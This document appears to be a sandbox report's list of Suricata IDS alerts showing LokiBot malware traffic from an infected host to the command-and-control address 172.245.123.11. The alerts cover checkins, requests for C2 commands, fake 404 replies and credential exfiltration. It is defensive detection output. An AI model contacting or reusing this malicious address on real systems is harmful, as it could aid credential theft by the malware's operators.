                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49760 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49760 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49766 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49766 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49710 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49742 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49760 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49760 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49708 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49710 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49705 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49705 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49716 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49732 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49723
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49720 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49716 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49722
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49706 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49714
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49704 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49717
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49705 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49708 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49706 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49740 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49716 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49704 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49709
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49766
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49704 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49708 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49772 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49720 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49772 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49772 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49705 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49740 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49742
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49711
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49772 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49772 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49732
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49739 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49725 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49760
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49725 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49715
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49739 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49734
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49718
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49741
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49736
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49712 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49712 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49772
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49712 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49708
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49801 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49804 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49815 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49810 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49720
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49725
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49801 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49801 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49801 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49801 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49795 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49739
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49795 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49712 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49854 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49854 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49854 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49828 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49828 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49828 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49810 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49795 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49860 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49828 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49804 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49804 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49854 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49810 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49719 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49748 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49860 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49748 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49716
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49748 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49804 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49778 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49804 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49712 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49795 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49810 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49748 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49748 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49828 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49821 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49821 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49860 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49854 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49740
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49860 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49860 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49821 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49810 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49821 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49821 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49877 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49883 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49883 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49795 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49801
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49727 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49727 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49727 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49778 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49883 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49719 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49877 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49889 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49877 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49712
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49883 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49883 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49790 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49748
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49889 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49877 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49727 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49815 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49727 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49778 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49889 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49828
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49889 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49839 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49889 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49860
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49877 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49778 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49790 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49778 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49815 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49790 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49854
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49839 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49839 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49815 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49815 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49810
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49790 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49784 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49790 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49784 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49883
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49784 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 172.245.123.11:80 -> 192.168.2.5:49795
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49784 -> 172.245.123.11:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49784 -> 172.245.123.11:80
